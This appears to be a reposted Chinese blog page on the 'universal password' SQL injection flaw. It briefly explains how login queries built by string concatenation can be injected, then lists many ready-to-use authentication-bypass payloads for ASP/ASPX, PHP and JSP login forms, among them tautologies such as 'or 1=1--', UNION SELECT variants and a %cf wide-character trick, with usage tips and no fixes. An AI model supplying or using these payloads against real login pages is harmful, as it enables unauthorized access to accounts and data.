• 万能密码漏洞


    漏洞原理:网站把密码放到数据库中,在登陆验证中一般都用以下sql查询语句去查找数据库, sql=select * from user where username='username' 
    sql="select * from user where username='"&username&"'and pass='"& pass&'" ,

    asp aspx万能密码
      1: "or "a"="a
       2: ')or('a'='a
       3:or 1=1--
       4:'or 1=1--
       5:a'or' 1=1--
       6: "or 1=1--
       7:'or'a'='a
       8: "or"="a'='a
       9:'or''='
       10:'or'='or'
       11: 1 or '1'='1'=1
       12: 1 or '1'='1' or 1=1
       13: 'OR 1=1%00
       14: "or 1=1%00
       15: 'xor
       16: 新型万能登陆密码
       用户名 ' UNION Select 1,1,1 FROM admin Where ''=' (替换表名admin)
       密码 1
       Username=-1%cf' union select 1,1,1 as password,1,1,1 %23
       Password=1
       17..admin' or 'a'='a 密码随便

     PHP万能密码
       'or'='or'
       'or 1=1/* 字符型 GPC是否开都可以使用
       User: something
       Pass: ' OR '1'='1

       jsp 万能密码
       1'or'1'='1
       admin' OR 1=1/*
       用户名:admin 系统存在这个用户的时候 才用得上
       密码:1'or'1'='1

    admin' or 'a'='a  与 admin' or 1=1--用户名应该是存在的,然后是闭合后半个单引号或者用--注释掉。

  • 相关阅读:
    hibernate 批量增加 修改 删除
    Java WebService入门实例
    linux中Jetty的安装和配置
    Jetty与tomcat的比较
    在云上搭建大规模实时数据流处理系统
    大型开源日志系统比较
    JMX整理
    Gradle笔记——Gradle的简介与安装
    Groovy入门教程
    Apache Maven 入门篇 ( 上 )
  • 原文地址:https://www.cnblogs.com/lhq8998/p/7290286.html
Copyright © 2020-2023  润新知